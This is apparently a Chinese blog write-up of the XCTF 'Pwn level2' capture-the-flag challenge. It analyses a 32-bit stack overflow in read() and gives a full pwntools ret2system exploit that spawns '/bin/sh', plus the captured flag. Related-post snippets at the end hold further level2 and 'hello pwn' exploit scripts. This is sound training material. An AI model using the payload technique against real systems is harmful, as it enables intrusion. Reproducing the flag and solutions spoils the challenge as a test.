攻防世界 Pwn level2

原创 已于 2022-04-17 12:18:27 修改 · 658 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf

于 2021-07-16 18:08:13 首次发布
博客详细分析了一个32位程序的溢出漏洞,通过checksec发现了 Partial RELRO 和缺乏 canary 与 PIE 的保护。ida32分析显示,存在一个read函数可能导致缓冲区溢出,且plt表中包含system函数。利用思路是通过构造payload利用read函数改变rbp下的ret地址,执行system并控制参数来运行'/bin/sh'。最终编写了exploit代码成功获取flag。

攻防世界 Pwn level2

1.file 和 checksec 先走一遍

在这里插入图片描述

  • 是一个32位的文件
  • 看到 RELRO的状态是 Partial
  • 没有canary也没有pie
  • 直接静态调试一下即可

2.放进IDA32看一下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  system("echo 'Hello World!'");
  return 0;
}
  • 有一个system函数
  • 进入vulnerable_function看一下
ssize_t vulnerable_function()
{
  char buf[136]; // [esp+0h] [ebp-88h] BYREF

  system("echo Input:");
  return read(0, buf, 0x100u);
}
  • read函数允许最大输入是0x100,数量足够大,所以buf可以溢出
  • 看看buf的溢出大小
-00000088
-00000088 buf             db 136 dup(?)
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008
+00000008 ; end of stack variables
  • 136byte的buf再加上4byte的数据溢出返回system的地址
  • 本题开始前就提示我们用ROP
  • 看一下plt表
.plt:08048320 ; Attributes: thunk
.plt:08048320
.plt:08048320 ; int system(const char *command)
.plt:08048320 _system         proc near               ; CODE XREF: vulnerable_function+11↓p
.plt:08048320                                         ; main+1E↓p
.plt:08048320
  • 看到了plt中有system
  • 我们写exp时直接用 elf.plt()函数即可

3.利用思路

  • 利用read函数修改rbp下的ret地址执行system
  • 并且我们要控制程序执行 “/bin/sh”
  • 这个时候要学一下32位程序传参
+--------+------------------+
|  rbp   |    rbp_addr      |  <----------栈底指针     
+--------+------------------+
|  rip   |    rip_addr      |  <----------函数执行完之后将要返回的地址
+--------+------------------+
| argv1  |    argv1_addr    |  <----------参数1
+--------+------------------+
| argv2  |    argv2_addr    |  <----------参数2
+--------+------------------+
|  ···   |        ···       |  <----------参数N
  • 这个是栈上执行完被调用函数返回的过程
  • 但是我们利用这个思路构造rop时要注意我们不是使用的call命令执行危险函数
  • 所以并不会帮我们自动分配危险函数的返回地址
  • 因此当我们调用system@plt时
  • 按照汇编的执行顺序
  • 现在参数1的位置会变成危险函数的返回地址
  • 参数二的位置才是危险函数的第一个参数
  • 因此我们构造的时候要把这个危险函数的返回地址填上垃圾数据覆盖掉

4.编写exp

先构造paylod

system_plt = elf.plt["system"]
bin_sh     = next(elf.search(b"/bin/sh"))

payload = b'a' * (0x88 + 4)
payload = payload + p32(system_plt)
payload = payload + b'a' * 4
payload = payload + p32(bin_sh)

看一下exp

from pwn import *

elf = ELF("./level2")
p = remote("111.200.241.244" , 64128)
#p = process("./level2")

system_plt = elf.plt["system"]
bin_sh     = next(elf.search(b"/bin/sh"))
payload = b'a' * ( 0x88 +4)            # 覆盖的垃圾数据
payload = payload + p32(system_plt)    # system的地址
payload = payload + b'a'*4             # system的返回地址
payload = payload + p32(bin_sh)

p.recvline("Input:")
p.sendline(payload)

p.interactive()

运行一下
在这里插入图片描述
直接cat flag

cat flag

在这里插入图片描述
得到flag

cyberpeace{2e8cd94fcdd38cd0eebd6da2236c90ee}

4.题目下载地址

点击下载

攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1719
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界PWN-level2
Deeeelete的博客
11-13 1281
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界pwn-level2
a_silly_coder的博客
01-14 357
下载文件后,首先查看保护 将文件拖入ida 32位,发现函数名明示了攻击点 点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。 确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置 随后寻找sh或者bin_sh字符串: 此时要素齐全,开始编写脚本。 设计栈的结构为: 脚本为: 发送脚本,开始攻击: ...
攻防世界pwn level2
2401_83086823的博客
09-23 529
想要溢出buf,就要0x88-0x00+0x04个字节,溢出部分为实现system函数,system(command)的command为/bin/sh,即可拿到shell.2.system返回值为四个字节,为了堆栈平衡,填上四个垃圾字符,再到/bin/sh地址。进入vulnerable_function(这个名字其实就给了提示)buf大小为0x88,read范围为0x100,存在溢出漏洞。查看字符串,看到了system,/bin/sh.1.buf溢出写入system地址。
[攻防世界 pwn]——level2
Y_peak的博客
02-18 363
[攻防世界 pwn]——level2 题目地址: https://adworld.xctf.org.cn/ 题目: 32位程序 IDA中, 找到system和 ‘/bin/sh’ 地址进行覆盖 exploit from pwn import * p = remote("111.200.241.244",55083) system_addr = 0x0804845C binsh = 0x0804A024 payload = 'a' * (0x88 + 0x4) + p32(system_addr
攻防世界pwn——level3
qq_62076255的博客
11-05 890
攻防世界pwn——level3
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1688
学习pwn开始,慢慢来不要急
攻防世界 - pwn - level2
qq726232111的博客
03-16 294
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 561
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 984
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
CTF PWN - ROP ->Payload实例(攻防世界level2
yajuanpi4899的博客
11-04 1895
ROP(Return Oriented Programming)攻击原理:提取反汇编中以ret结尾的代码片段或函数组合实现拓展可写栈空间,组成/bin/sh等常用系统执行命令。 ret指令:将ESP(栈顶地址)中地址弹出至EIP寄存器,代码自动跳转到之前栈顶存放的返回地址,以此构成rop链。(X86)rop链即是基于以上这个简单的原理,在代码空间中寻找以ret结尾的代码片段或函数(代码片段称为Rop gadgets),组合可以实现拓展可写栈空间、写入内存、shell等功能,依靠ret将代码执行权紧握在自己
攻防世界level2
weixin_43489686的博客
03-30 391
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
攻防世界 level2
10-04 515
1.题目 2.IDA分析 3.流程分析 流程很简单,输入信息,输出hello world。read函数也存在明显的溢出点。问题是没有找到现成可用的函数cat flag或者调用system函数。因此,只能我们自己构造。 如上图 我们可以获取到system和‘/bin/sh’的地址(注意,/bin/sh在.data段,如果是.rdata段则不能利用,原因还没有找到,可能是因为rdata只读不能执行?知道的读者麻烦评论告知一下~),exp如下: from pwn import...
攻防世界-level2
32bin的博客
04-08 396
【代码】攻防世界-level0。
攻防世界_level2
RMC131的博客
04-10 4523
checksec IDA exp from pwn import * p = remote('111.200.241.244',58154) payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024) p.recvuntil("Input:") p.send(payload) p.interactive() 运行得到flag
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2551
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
[攻防世界]level2
逆向萌新的博客
05-31 310
[攻防世界]level2
pwn 例题level2解析
m0_67423114的博客
04-26 645
下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料。看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址。可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看。通过这种套路,确实获得了/bin/sh的地址!
攻防世界pwn题hello pwn答案
最新发布
09-24
攻防世界pwn题hello pwn有多份解题代码可作为答案参考: - 代码一: ```python from pwn import * # io = process("./hello_pwn") io = remote("111.200.241.244",65258) io.recvuntil("lets get helloworld for bof") #unk_601068与dword_60106C之间有4字节的空间,所以使用4个A填充 #随后使用预期数据1853186401覆盖dword_60106C payload = b'A' * 4 + p64(1853186401) io.sendline(payload) io.interactive() ``` 此代码中,先建立远程连接,等待特定提示信息,构造包含填充字符和预期数据的`payload`,发送`payload`后进入交互模式 [^2]。 - 代码二: ```python from pwn import * context(os='linux', arch="amd64", log_level="debug") os = remote('61.147.171.105',61286) os.recvuntil('lets get helloworld for bof\n') payload = b'a'*(0x6c-0x68) + p64(1853186401) os.sendline(payload) os.interactive() ``` 该代码先设置上下文信息,建立远程连接,等待特定提示信息,根据内存地址差值构造`payload`,发送`payload`后进入交互模式 [^3]。 - 代码三: ```python from pwn import* p = remote('61.147.171.105',53737) # 将字符串转换为字节对象 str_bytes = 'a'*4 # 构造payload payload = str_bytes.encode() + p64(1853186401) p.recvuntil("lets get helloworld for bof\n") p.sendline(payload) p.interactive() ``` 代码从`pwn`库导入所有功能,创建远程连接对象,构造包含4个`a`的字符串并转换为字节对象,与预期数据拼接成`payload`,等待特定提示信息后发送`payload`,最后进入交互模式 [^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值